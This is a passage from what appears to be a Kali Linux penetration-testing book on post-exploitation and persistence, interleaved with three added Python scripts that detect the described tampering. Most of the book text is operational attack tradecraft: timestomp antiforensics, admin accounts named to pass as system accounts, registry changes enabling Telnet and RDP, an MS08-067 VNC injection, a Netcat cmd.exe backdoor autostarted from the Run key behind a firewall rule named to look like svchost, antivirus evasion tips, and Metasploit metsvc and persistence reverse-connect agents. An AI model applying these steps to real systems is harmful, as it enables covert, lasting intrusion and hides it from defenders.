set times in a directory or on a particular drive using the following command: 

meterpreter> timestomp C:\\ -r 

The solution is not perfect. It is very obvious that an attack has occurred. 
Furthermore, it is possible for timestamps to be retained in other locations on a hard 
drive and be accessible for investigation. If the target system is actively monitoring 
changes to system integrity using an intrusion detection system, such as Tripwire, 
alerts of the timestomp activity will be generated. Therefore, destroying timestamps 
is of limited value when a stealthy approach is truly required. 
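The artifacts described in this section (the 1601 and 2106 sentinel values, timestamps copied from a template file, and whole directories stamped alike) can be hunted for in a file listing. The following is an added example written for this edition, not code from the book; its input records mirror the fields printed by timestomp -v, and the sample records and the min_files threshold are constructed assumptions.

```python
"""Added example (not from the book): flag files whose MACE timestamps carry the
artifacts that timestomp leaves behind. Each record mirrors one 'timestomp <file> -v'
output; the sample records and the min_files threshold are constructed assumptions."""
from datetime import datetime

# Sentinel years seen in the chapter: Windows shows a blanked timestamp as the
# FILETIME epoch (1601), while 'timestomp -v' reports the same blank as 2106.
FILETIME_EPOCH_YEAR = 1601
BLANK_YEAR = 2106
MACE_FIELDS = ("modified", "accessed", "created", "entry_modified")


def parse_ts(value):
    """Parse 'YYYY-MM-DD HH:MM:SS -0400', the format printed by timestomp -v."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S %z")


def file_findings(record):
    """Return the reasons a single record looks tampered with (empty if none)."""
    reasons = []
    ts = {field: parse_ts(record[field]) for field in MACE_FIELDS}
    for field, t in ts.items():
        if t.year == FILETIME_EPOCH_YEAR:
            reasons.append(f"{field} is the 1601 epoch (blanked)")
        elif t.year >= BLANK_YEAR:
            reasons.append(f"{field} is in the far future ({t.year})")
    # The MFT entry is written when the file is created, so an 'entry modified'
    # time earlier than 'created' cannot arise naturally (e.g. after 'timestomp -c').
    if ts["entry_modified"] < ts["created"]:
        reasons.append("MFT entry modified before creation time")
    return reasons


def shared_timestamp_sets(records, min_files=2):
    """Group files whose four timestamps are identical to the second. Unrelated
    files rarely share a full MACE set; 'timestomp -f <template>' copies and
    recursive 'timestomp -r' runs produce exactly such groups."""
    groups = {}
    for record in records:
        key = tuple(record[field] for field in MACE_FIELDS)
        groups.setdefault(key, []).append(record["path"])
    return [paths for paths in groups.values() if len(paths) >= min_files]


def scan(records, min_files=2):
    """Return {path: [reasons]} for every record with at least one finding."""
    findings = {}
    for record in records:
        reasons = file_findings(record)
        if reasons:
            findings[record["path"]] = reasons
    for paths in shared_timestamp_sets(records, min_files):
        for path in paths:
            findings.setdefault(path, []).append(
                f"shares its full MACE set with {len(paths) - 1} other file(s)")
    return findings


def rec(path, modified, accessed, created, entry_modified):
    """Build one record in the shape scan() expects."""
    return {"path": path, "modified": modified, "accessed": accessed,
            "created": created, "entry_modified": entry_modified}


# Constructed sample: README.txt after 'timestomp -b', notes.txt after
# 'timestomp -f' with cmd.exe as the template, svc.log with blanked fields as
# Windows shows them, helper.dll with an impossible ordering, and two untouched files.
SAMPLE = [
    rec(r"C:\README.txt", "2106-02-07 01:28:15 -0500", "2106-02-07 01:28:15 -0500",
        "2106-02-07 01:28:15 -0500", "2106-02-07 01:28:15 -0500"),
    rec(r"C:\WINDOWS\system32\cmd.exe", "2008-04-14 08:00:00 -0400",
        "2013-09-16 07:04:16 -0400", "2008-04-14 08:00:00 -0400", "2008-04-14 08:00:00 -0400"),
    rec(r"C:\WINDOWS\system32\notes.txt", "2008-04-14 08:00:00 -0400",
        "2013-09-16 07:04:16 -0400", "2008-04-14 08:00:00 -0400", "2008-04-14 08:00:00 -0400"),
    rec(r"C:\WINDOWS\Temp\svc.log", "1601-01-01 00:00:00 +0000", "2013-09-16 06:46:43 -0400",
        "1601-01-01 00:00:00 +0000", "2013-09-16 06:46:43 -0400"),
    rec(r"C:\WINDOWS\system32\helper.dll", "2013-09-16 07:04:16 -0400",
        "2013-09-16 07:04:16 -0400", "2013-09-16 07:04:16 -0400", "2013-09-15 12:00:00 -0400"),
    rec(r"C:\Documents and Settings\user\report.doc", "2013-09-10 09:12:44 -0400",
        "2013-09-16 06:46:43 -0400", "2013-09-01 11:00:05 -0400", "2013-09-10 09:12:44 -0400"),
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE).items():
        print(path)
        for reason in reasons:
            print("   ", reason)
```

The shared-set check deliberately reports every member of a group, including the template file itself, so the analyst sees which system binary the timestamps were copied from.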
Summary 

In this chapter, we focused on the immediate actions that follow exploitation of a 
target system. We reviewed the initial rapid assessment conducted to characterize 
the server and the local environment. We also learned how to identify and locate 
target files of interest, create user accounts, perform vertical escalation to improve 
access privileges, and remove signs of an intrusion. 

In the next chapter, we will learn how to implement a persistent backdoor to retain 
access, and we will learn techniques to support covert communications with the 
compromised system. 
The final stage of the attacker's kill chain is the "command, control, and 
communicate" phase, where the attacker relies on a persistent connection with the 
compromised system to ensure that they can continue to maintain their control. 

To be effective, the attacker must be able to maintain interactive persistence — they 
must have a two-way communication channel with the exploited system (interactive) 
that remains on the compromised system for a long period of time without being 
discovered (persistence). This type of connectivity is a requirement because of the 
following reasons: 

• Network intrusions may be detected, and the compromised systems may be 
identified and patched 

• Some exploits only work once because the vulnerability is intermittent, 
exploitation causes the system to fail, or the exploit forces the system 
to change, rendering the vulnerability unusable 

• Attackers may need to return multiple times to the same target for 
various reasons 

• The target's usefulness is not always immediately known at the time 
it is compromised 

The tool used to maintain interactive persistence is usually referred to by classical 
terms such as backdoor or rootkit. However, the trend towards long-term 
persistence by both automated malware and human attacks has blurred the meaning 
of traditional labels; so instead, we will refer to malicious software that is intended 
to stay on the compromised system for a long period of time as persistent agents. 

These persistent agents perform many functions for attackers and penetration testers, 
including the following: 

• Allow additional tools to be uploaded to support new attacks, especially 
against systems located on the same network. 

• Facilitate the exfiltration of data from compromised systems and networks. 
• Allow attackers to reconnect to a compromised system, usually via an 
encrypted channel to avoid detection. Persistent agents have been known to 
remain on systems for more than a year. 

• Employ antiforensic techniques to avoid being detected, including hiding in 
the target's filesystem or system memory, using strong authentication, and 
using encryption. 

In this chapter you will learn about the following: 

• Compromising existing system and application files for remote access 

• Creating persistent agents 

• Maintaining persistence with the Metasploit Framework 

• Redirecting ports to bypass network controls 

Compromising the existing system and application files for remote access 

The best persistent agent is one that does not need to be hidden because it is part of 
the existing file structure of the compromised system; the attacker only has to add 
certain functionality to convert regular system files and applications into persistent 
agents. This approach can almost never be detected by security controls such as 
intrusion detection systems. 

Remotely enabling the Telnet service 

One technique used to maintain remote access is to use the Metasploit Framework to 
enable the Telnet service on a Windows platform and use it to provide persistence. 

The first step is to compromise the target system to obtain a meterpreter session 
(migrate the session to ensure a stable shell) and then elevate access privileges. 
Next, obtain a local command shell to access the target system using the 
following command: 

meterpreter> execute -H -f cmd -i 

When executed, this command creates an interactive command shell (-i) that runs 
as a hidden process (-H). 

Using the command prompt of the shell, create a new user account. When 
creating user accounts to ensure persistence, many attackers use the following 
two-part strategy: 

• Create an account with a name that will attract attention if the compromise is 
investigated (for example, Leet7737) 

• Create an account that appears to be part of normal system functions, such as 
Service_Account, using the following commands: 

C:\net user Service_Account password /ADD 

C:\net localgroup administrators Service_Account /ADD 

When the new user accounts have been created, exit the Windows command shell. 

To enable Telnet, run the following command from the meterpreter prompt: 

run gettelnet -e 

The execution of the previous command is shown in the following screenshot: 

meterpreter > run gettelnet -e 
[*] Windows Telnet Server Enabler Meterpreter Script 
[*] Setting Telnet Server Services service startup mode 
    The Telnet Server Services service is not set to auto, changing it to auto... 
    Opening port in local firewall if necessary 
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/gettelnet/clean_up__20130920.2039.rc 
The script shown in the previous screenshot creates a persistent Telnet service on 
the compromised system. To access it, connect to the system's IP address using the 
Telnet protocol and provide the username and password that were used to create the 
account, as shown in the following screenshot: 

root@kali:~# telnet 192.168.43.128 
Trying 192.168.43.128... 
Connected to 192.168.43.128. 
Escape character is '^]'. 
Welcome to Microsoft Telnet Service 

login: Service_Account 
password: 

*=============================================================== 
Welcome to Microsoft Telnet Server. 
*=============================================================== 
C:\Documents and Settings\Service_Account> 



The Telnet service will persist until it is removed. Unfortunately, there are some 
limitations to using Telnet: it is readily detectable (especially because credentials 
are transmitted in the clear) and it functions only in the command-line mode. 

However, what if you need to have a GUI to access certain applications on the 
compromised system? 

Remotely enabling Windows Terminal Services 

One of the most reliable techniques to ensure remote access is to persistently enable 
Windows Terminal Services, also known as the Remote Desktop Protocol (RDP). 
To do so, you must have administrator privileges and know the version of the 
target's operating system. 

For example, if the target is Windows 7, use meterpreter to obtain an interactive 
command shell on the target, and then enter the following commands to change 
the registry: 

C:\reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f 

C:\reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f 
To ensure that RDP will pass through the client-side firewall, add a rule using the 
following command: 

C:\netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 

Now we can start the RDP service using the following command: 

C:\net start Termservice 

This change that launches RDP is not yet persistent; use the following command to 
start RDP each time the computer is started: 

C:\sc config TermService start= auto 

The process of enabling RDP is not too complex, but it is one that should be scripted 
to reduce the possibility of errors, especially when working with the system registry. 
Fortunately, the meterpreter framework uses the getgui script to automatically 
enable RDP services. 
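Every change in this procedure (and in the Telnet one before it) lands in the registry, which gives a defender a cheap way to spot it. The following is an added example for this edition, not the book's or Metasploit's code: it parses reg query output, reports RDP or Telnet being enabled on a host whose baseline does not expect them, and diffs the live values against a known-good snapshot. The service names TermService and TlntSvr, the Start-value meanings (2 = auto, 3 = manual, 4 = disabled) and both snapshots are assumptions constructed for the example.

```python
r"""Added example (not from the book): audit the remote-access settings this
section changes. parse_reg_query() reads 'reg query' output, audit_remote_access()
reports RDP or Telnet being enabled where the host baseline does not expect it,
and diff_against_baseline() lists every value added or changed since a known-good
snapshot. Service names, Start-value meanings and the sample output are assumptions."""
import re

REG_VALUE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
SERVICES = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
START_TYPES = {2: "auto", 3: "manual", 4: "disabled"}  # meaning of a service's Start value


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} parsed from 'reg query' output."""
    result, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            result.setdefault(current, {})
        elif current is not None:
            m = REG_VALUE.match(line)
            if m:
                name, vtype, data = m.groups()
                result[current][name] = (vtype, data.strip())
    return result


def dword(entry):
    """Decode a REG_DWORD entry such as ('REG_DWORD', '0x2') to an int."""
    data = entry[1]
    return int(data, 16) if data.lower().startswith("0x") else int(data)


def audit_remote_access(reg, rdp_expected=False, telnet_expected=False):
    """Findings for RDP/Telnet enabled on a host whose baseline does not allow them."""
    findings = []
    ts = reg.get(TS_KEY, {})
    if not rdp_expected and "fDenyTSConnections" in ts and dword(ts["fDenyTSConnections"]) == 0:
        findings.append("RDP connections allowed: fDenyTSConnections=0")
    for svc, expected in (("TermService", rdp_expected), ("TlntSvr", telnet_expected)):
        values = reg.get(f"{SERVICES}\\{svc}", {})
        if not expected and "Start" in values and dword(values["Start"]) == 2:
            findings.append(f"{svc} starts automatically (Start=2, {START_TYPES[2]})")
    return findings


def diff_against_baseline(reg, baseline):
    """(key, value, old, new) for every value added or changed since the snapshot."""
    changes = []
    for key, values in reg.items():
        base = baseline.get(key, {})
        for name, (_vtype, data) in values.items():
            if name not in base:
                changes.append((key, name, None, data))
            elif base[name][1] != data:
                changes.append((key, name, base[name][1], data))
    return changes


# Constructed snapshots: BASELINE is a clean host; CURRENT shows the same host
# after the reg add, sc config and gettelnet steps described in this chapter.
BASELINE = parse_reg_query(r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x1
    TSUserEnabled    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService
    Start    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr
    Start    REG_DWORD    0x4
""")

CURRENT = parse_reg_query(r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
    AllowTSConnections    REG_DWORD    0x1
    TSUserEnabled    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService
    Start    REG_DWORD    0x2

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr
    Start    REG_DWORD    0x2
""")

if __name__ == "__main__":
    for finding in audit_remote_access(CURRENT):
        print("FINDING:", finding)
    for key, name, old, new in diff_against_baseline(CURRENT, BASELINE):
        print("CHANGED:", key, name, old, "->", new)
```

The baseline diff is what catches values the audit does not know about, such as the AllowTSConnections value the reg add command above creates.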

When run from the meterpreter prompt, the command line shown in the following 
screenshot creates the account's username and password, hides the account from the 
log-in screen, and makes the necessary changes to the registry to remain persistent. 
The following screenshot shows the command used to create a username that 
appears to be a legitimate account (Service Account) with a simple password. 

meterpreter > run getgui -u Service_Account -p pa$$word 
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator 
[*] Carlos Perez carlos_perez@darkoperator.com 
[*] Setting user account for logon 
    Adding User: Service_Account with Password: pa$$word 
    Hiding user from Windows Login screen 
    Adding User: Service_Account to local group 'Remote Desktop Users' 
    Adding User: Service_Account to local group 'Administrators' 
[*] You can now login with the created user 
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20130920.1313.rc 



To connect to the compromised remote desktop, use Kali's rdesktop program. 
Remotely enabling Virtual Network Computing 

If the system contains applications that are known to be compromised (especially 
remote-access programs), it may be possible to take advantage of the existing 
vulnerabilities to exploit the system. For example: 

• It may be possible to extract remote-access passwords for some programs 
from the registry. VNC stores passwords in the registry, and these can 
be obtained by manually extracting the registry key or by uploading and 
executing an application such as NirSoft's VNCPassView. 

• Different versions of VNC contain different vulnerabilities that can be 
exploited to compromise the application and gain remote access to the 
system. If the user has a current version installed, it may be possible to 
uninstall that version and install an older version in its place. Due to the 
similarity of functionality among the versions, the user may not notice the 
substitution, but an attacker can use the authentication bypass exploits 
found in older VNC versions to maintain access in the post-compromise phase. 

Metasploit comes with the ability to introduce VNC directly to an exploited system 
using the VNCINJECT module. 

In the following screenshot, VNC was selected as the payload instead of the regular 
reverse_TCP shell: 

msf > use windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp 
PAYLOAD => windows/vncinject/bind_tcp 
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.128 
RHOST => 192.168.43.128 
msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service 
[*] Selected Target: Windows XP SP3 E 
[*] Attempting to trigger the vulnera 
[*] Sending stage (445440 bytes) to 1 
[*] Starting local TCP relay on 127.0 
[*] Local TCP relay started. 
[*] Launched vnc viewer. 
[*] Session 1 created in the background. 
msf exploit(ms08_067_netapi) > Connected 

(The VNC viewer window, titled "TightVNC: rwbeggs-1e69067", overlaps the console and truncates the lines above.) 

Enabling TightVNC protocol extensions 
No authentication needed 
Authentication successful 
Desktop name "rwbeggs-1e69067" 

*** Metasploit Courtesy Shell (TM) *** 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> 
This attack does not require any authentication. If you're testing a client site, ensure 
that all vulnerable applications are removed from the compromised system once the 
vulnerability has been proved; otherwise, you've created an access point that can be 
found and used by any other attacker! 

Using persistent agents 

Traditionally, attackers would place a backdoor on a compromised system — if the 
front door provided authorized access to legitimate users, the backdoor applications 
allowed attackers to return to an exploited system and access to services and data. 

Unfortunately, the classical backdoors provided limited interactivity and were not 
designed to be persistent on the compromised systems for very long time frames. This 
was viewed as a significant shortcoming by the attacker community, because once the 
backdoor was discovered and removed, there was additional work required to repeat 
the compromise steps and exploit the system, which was made more difficult by the 
forewarned system administrators defending the network and its resources. 

Kali now focuses on persistent agents that, if properly employed, are more difficult to 
detect. The first tool we will review is the venerable Netcat. 

Employing Netcat as a persistent agent 

Netcat is an application that supports reading from and writing to network 
connections using "raw" TCP and UDP packets. Unlike packets that are organized by 
services such as Telnet or FTP, Netcat's packets are not accompanied by headers or 
other channel information specific to the service. This simplifies communications and 
allows for an almost-universal communication channel. 

The last stable version of Netcat was released by Hobbit in 1996, and it has remained 
as useful as ever; in fact, it is frequently referred to as the TCP/IP Swiss army knife. 
Netcat can perform many functions, including the following: 

• Port scanning 

• Banner grabbing to identify services 

• Port redirection and proxying 

• File transfer and chatting, including support for data forensics 
and remote backups 

• Use as a backdoor or an interactive persistent agent, on a 
compromised system 
At this point, we will focus on using Netcat to create a persistent shell on a 
compromised system. Although the following example uses Windows as the 
target platform, it functions the same when used on a Unix-based platform. 

In the example shown in the following screenshot, we will retain the executable's 
name, nc.exe; however, it is common to rename it prior to use in order to minimize 
detection. Even if it is renamed, it will usually be identified by antivirus software; 
many attackers will alter or remove elements of Netcat's source code that are not 
required and recompile it prior to use. Such changes can alter the specific signature 
that antivirus programs use to identify the application as Netcat, making it invisible 
to them. 

Netcat is stored on Kali in the /usr/share/windows-binaries repository. 

To upload it to a compromised system, enter the following command from 
within meterpreter: 

meterpreter> upload /usr/share/windows-binaries/nc.exe C:\\WINDOWS\\system32 

The execution of the previous command is shown in the following screenshot: 

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\WINDOWS\\system32 
[*] uploading  : /usr/share/windows-binaries/nc.exe -> c:\WINDOWS\system32 
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> c:\WINDOWS\system32\nc.exe 



You do not have to place it in the system32 folder specifically; however, due to 
the number and diversity of filetypes in this folder, this is the best location to hide a 
file in a compromised system. 

While conducting a penetration test on one client, we identified six 
separate instances of Netcat on one server. Netcat had been installed 
twice by two separate system administrators to support network 
management; the other four instances were installed by external attackers 
and were not identified until the penetration test. Therefore, always look 
to see whether or not a Netcat is already installed on your target! 

If you do not have a meterpreter connection, you can use Trivial File Transfer 
Protocol (TFTP) to transfer the file. 

Next, configure the registry to launch Netcat when the system starts up and ensure 
that it is listening on port 444 (or any other port that you have selected, as long as it 
is not in use) using the following command: 
meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe' 

Confirm that the change in the registry was successfully implemented using the 
following queryval command: 

meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc 

Using the netsh command, open a port on the local firewall to ensure that the 
compromised system will accept remote connections to Netcat. It is important 
to know the target's operating system. The netsh advfirewall firewall 
command-line context is used for Windows Vista, and Windows Server 2008 and 
later versions; the netsh firewall command is used for earlier operating systems. 

To add a port to the local Windows firewall, enter the shell command at the 
meterpreter prompt and then enter the rule using the appropriate command. 

When naming the rule, use a name such as svchostpassthrough that suggests 
that the rule is important for the proper functioning of the system. A sample 
command is shown as follows: 

C:\Windows\system32>netsh firewall add portopening TCP 444 "service passthrough" 

Confirm that the change was successfully implemented using the following command: 

C:\windows\system32>netsh firewall show portopening 

The execution of the previously mentioned commands is shown in the 
following screenshot: 

meterpreter > shell 
Process 1016 created. 
Channel 3 created. 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32>netsh firewall add portopening TCP 444 "svchost passthrough" 
netsh firewall add portopening TCP 444 "svchost passthrough" 
Ok. 

C:\WINDOWS\system32>netsh firewall show portopening 
netsh firewall show portopening 

Port configuration for Standard profile: 
Port   Protocol  Mode     Name 
------------------------------------------------------------------- 
444    TCP       Enable   svchost passthrough 
When the port rule is confirmed, reboot the system to ensure that the autorun entry 
starts Netcat as intended. Either: 

• Enter the following command from the meterpreter prompt: 

meterpreter> reboot 

• Enter the following command from an interactive Windows shell: 

C:\windows\system32>shutdown -r -t 00 

To remotely access the compromised system, type nc at a command prompt, indicate 
the verbosity of the connection (-v reports basic information and -w reports much 
more information), and then enter the IP address of the target and the port number, 
as shown in the following screenshot: 

root@kali:~# nc -v 192.168.43.128 444 
192.168.43.128: inverse host lookup failed: Unknown server error : Connection timed out 
(UNKNOWN) [192.168.43.128] 444 (snpp) open 
Microsoft Windows XP [Version 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\DigitalDefence> 



Unfortunately, there are some limitations to using Netcat — there is no authentication 
or encryption of transmitted data, and it is detected by nearly all antivirus software. 

The lack of encryption can be resolved using cryptcat, a Netcat variant that uses the 
Twofish encryption to secure data during transmission between the exploited host 
and the attacker. Twofish encryption, developed by Bruce Schneier, is an advanced 
symmetric block cipher that provides reasonably strong protection for encrypted data. 

To use cryptcat, ensure that there is a listener ready and configured with a strong 
password, using the following command: 

root@kali:~# cryptcat -k password -l -p 444 

Next, upload cryptcat to the compromised system and configure it to connect with 
the listener's IP address using the following command: 

C:\cryptcat -k password <listener IP address> 444 
Unfortunately, Netcat and its variants remain detectable by most antivirus 
applications. It is possible to render Netcat undetectable using a hex editor to alter the 
source code of Netcat; this will help avoid triggering the signature matching action of 
the antivirus, but this can be a long trial-and-error process. A more efficient approach 
is to take advantage of the Metasploit Framework's persistence mechanisms. 

Maintaining persistence with the Metasploit Framework 

Metasploit's meterpreter contains several scripts that support persistence on a 
compromised system. We will examine two script options for placing a backdoor 
on a compromised system: metsvc and persistence. 

Using the metsvc script 

The metsvc script is a network service wrapper for meterpreter that allows it to 
either be used as a Windows service or run as a command-line application. It is 
typically used as a backdoor to maintain communications with a compromised system. 

To use metsvc, first compromise the system and then migrate meterpreter to the 
explorer.exe process to obtain a more stable shell. 

Execute the metsvc agent by invoking the run command, as shown in the following 
screenshot. As you can see, it creates a temporary installation directory, uploads three 
files (metsrv.dll, metsvc-server.exe, and metsvc.exe), and then starts metsvc. 

meterpreter > run metsvc 
[*] Creating a meterpreter service on port 31337 
[*] Creating a temporary installation directory C:\DOCUME~1\DIGITA~1\LOCALS~1\Temp\CvjrsZWOMK... 
[*]  >> Uploading metsrv.dll... 
[*]  >> Uploading metsvc-server.exe... 
[*]  >> Uploading metsvc.exe... 
[*] Starting the service... 
     * Installing service metsvc 
     * Starting service 
Service metsvc successfully installed. 
To interact with the persistent metsvc agent, the attacker opens the Metasploit 
Framework and selects use exploit/multi/handler with the payload 
windows/metsvc_bind_tcp, as shown in the following screenshot. The other parameters 
(IP address and port) are also set. 



msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp 
PAYLOAD => windows/metsvc_bind_tcp 
msf exploit(handler) > set LPORT 31337 
LPORT => 31337 
msf exploit(handler) > set RHOST 192.168.43.128 
RHOST => 192.168.43.128 
msf exploit(handler) > show options 

Module options (exploit/multi/handler): 

   Name  Current Setting  Required  Description 
   ----  ---------------  --------  ----------- 

Payload options (windows/metsvc_bind_tcp): 

   Name      Current Setting  Required  Description 
   ----      ---------------  --------  ----------- 
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none 
   LPORT     31337            yes       The listen port 
   RHOST     192.168.43.128   no        The target address 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Wildcard Target 



When the exploit command is executed, a session is opened directly between the 
two systems, allowing for the escalation of privileges and other functions to occur 
from the meterpreter command line. The execution of the exploit command is 
shown in the following screenshot: 

msf exploit(handler) > exploit 

[*] Starting the payload handler... 
[*] Started bind handler 
[*] Meterpreter session 1 opened (192.168.43.130:44930 -> 192.168.43.128:31337) at 2013-09-18 15:50:45 -0400 

meterpreter > pwd 
C:\WINDOWS\system32 
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 
The metsvc script requires no authentication; once the agent is in place, it can be 
used by anyone to gain access to the compromised system. Most attackers would 
not use this without altering the source code such that it requires authentication or 
ensuring that there is some method in place to filter out remote connections. 

More importantly, it is not a stealthy attack. Any attempt to list running processes, 
such as entering the ps command from the meterpreter prompt, will identify 
the metsvc service and the fact that the executable is running from a Temp 
directory, which is very suspicious! In the following screenshot, the directory with 
the random name (CvjrsZWOMK) located in the Temp folder is an obvious flag that 
a system has been compromised: 

 1832  1660  wscript.exe  x86  0  RWBEGGS-1E69067\DigitalDefence  C:\WINDOWS\System32\WScript.exe 
 1988  672   metsvc.exe   x86  0  NT AUTHORITY\SYSTEM             C:\DOCUME~1\DIGITA~1\LOCALS~1\Temp\CvjrsZWOMK\metsvc.exe 



A simple inspection of the Temp folder will identify the three hostile files, as shown 
in the following screenshot; however, these will usually be flagged by an antivirus 
before they are found by manual inspection. 



Windows Explorer, Address: C:\Documents and Settings\DigitalDefence\Local Settings\Temp\CvjrsZWOMK 

    Folders: Documents and Settings > DigitalDefence > Local Settings > Temp > CvjrsZWOMK 

    Contents of CvjrsZWOMK: 
        metsrv.dll 
        metsvc.exe 
        metsvc-server.exe 
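The two traits the text calls out in that ps listing (an image under Temp, and a SYSTEM-owned process living in a user profile) are easy to check mechanically. The following is an added example for this edition, not code from the book or from Metasploit: it parses a meterpreter ps listing and flags such rows. The listing is constructed to reproduce the chapter's two lines, and the directory markers are assumptions.

```python
r"""Added example (not from the book): parse a meterpreter 'ps' listing and flag
processes with the traits the metsvc agent shows above: an image under a Temp
directory, a SYSTEM-owned process whose image lives in a user profile, or a listed
name that does not match the image file. The listing is constructed to match the
chapter's screenshot; the path markers are assumptions."""
import re

# Columns: PID PPID Name Arch Session User Path. User and Path may contain single
# spaces, so they are separated by the run of two or more spaces between columns.
PS_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64|x86_64)\s+"
    r"(?P<session>\d+)(?:\s{2,}(?P<user>\S.*?))?(?:\s{2,}(?P<path>[A-Za-z]:\\\S.*?))?\s*$")
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")
PROFILE_MARKERS = ("\\documents and settings\\", "\\docume~1\\", "\\users\\")


def parse_ps(text):
    """Return one dict per process row; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m:
            row = m.groupdict()
            for field in ("pid", "ppid", "session"):
                row[field] = int(row[field])
            rows.append(row)
    return rows


def process_findings(row):
    """Reasons one process row deserves a closer look (empty list if none)."""
    reasons = []
    path = (row.get("path") or "").lower()
    user = (row.get("user") or "").upper()
    if any(marker in path for marker in TEMP_MARKERS):
        reasons.append("image runs from a temporary directory")
    if user.endswith("\\SYSTEM") and any(marker in path for marker in PROFILE_MARKERS):
        reasons.append("SYSTEM-owned process with its image inside a user profile")
    if path and not path.endswith("\\" + row["name"].lower()):
        reasons.append("listed name differs from the image file name")
    return reasons


def suspicious_processes(text):
    """{pid: [reasons]} for every flagged process in a 'ps' listing."""
    flagged = {}
    for row in parse_ps(text):
        reasons = process_findings(row)
        if reasons:
            flagged[row["pid"]] = reasons
    return flagged


# Constructed listing in meterpreter's 'ps' layout; the wscript.exe and metsvc.exe
# rows reproduce the two lines shown in the chapter.
PS_SAMPLE = r"""
Process List
============

 PID   PPID  Name          Arch  Session  User                            Path
 ---   ----  ----          ----  -------  ----                            ----
 4     0     System        x86   0
 672   4     services.exe  x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\services.exe
 1832  1660  wscript.exe   x86   0        RWBEGGS-1E69067\DigitalDefence  C:\WINDOWS\System32\WScript.exe
 1988  672   metsvc.exe    x86   0        NT AUTHORITY\SYSTEM             C:\DOCUME~1\DIGITA~1\LOCALS~1\Temp\CvjrsZWOMK\metsvc.exe
"""

if __name__ == "__main__":
    for pid, reasons in suspicious_processes(PS_SAMPLE).items():
        print(pid, "->", "; ".join(reasons))
```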





Using the persistence script 

A more effective approach for gaining persistence is to use the meterpreter 
prompt's persistence script. 

After a system has been exploited and the migrate command has moved the initial 
shell to a more secure service, an attacker can invoke the persistence script from 
the meterpreter prompt. 
Using -h in the command will identify the available options for creating a persistent 
backdoor, as shown in the following screenshot: 



meterpreter > run persistence -h 
Meterpreter Script for creating a persistent backdoor on a target host. 

OPTIONS: 

    -A        Automatically start a matching multi/handler to connect to the agent 
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used. 
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp. 
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges) 
    -T <opt>  Alternate executable template to use 
    -U        Automatically start the agent when the User logs on 
    -X        Automatically start the agent when the system boots 
    -h        This help menu 
    -i <opt>  The interval in seconds between each connection attempt 
    -p <opt>  The port on the remote host where Metasploit is listening 
    -r <opt>  The IP of the system running Metasploit listening for the connect back 



In the example shown in the following screenshot, we have configured persistence 
to run automatically when the system boots and to attempt to connect to our listener 
every 10 seconds. The listener is identified as the remote system (-r) with a specific 
IP address and port. Additionally, we could elect to use the -U option, which will 
start persistence when a user logs onto the system. 

meterpreter > run persistence -X -i 10 -p 444 -r 192.168.43.128 
Running Persistance Script 
Resource file for cleanup created at /root/.msf4/logs/persistence/RWBEGGS-1E69067_20130918.1449/RWBEGGS-1E69067_20130918.1449.rc 
Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=444 
[*] Persistent agent script is 611035 bytes long 
Persistent Script written to C:\WINDOWS\TEMP\eRCqtxBufilTB.vbs 
[*] Executing script C:\WINDOWS\TEMP\eRCqtxBufilTB.vbs 
[+] Agent executed with PID 1360 
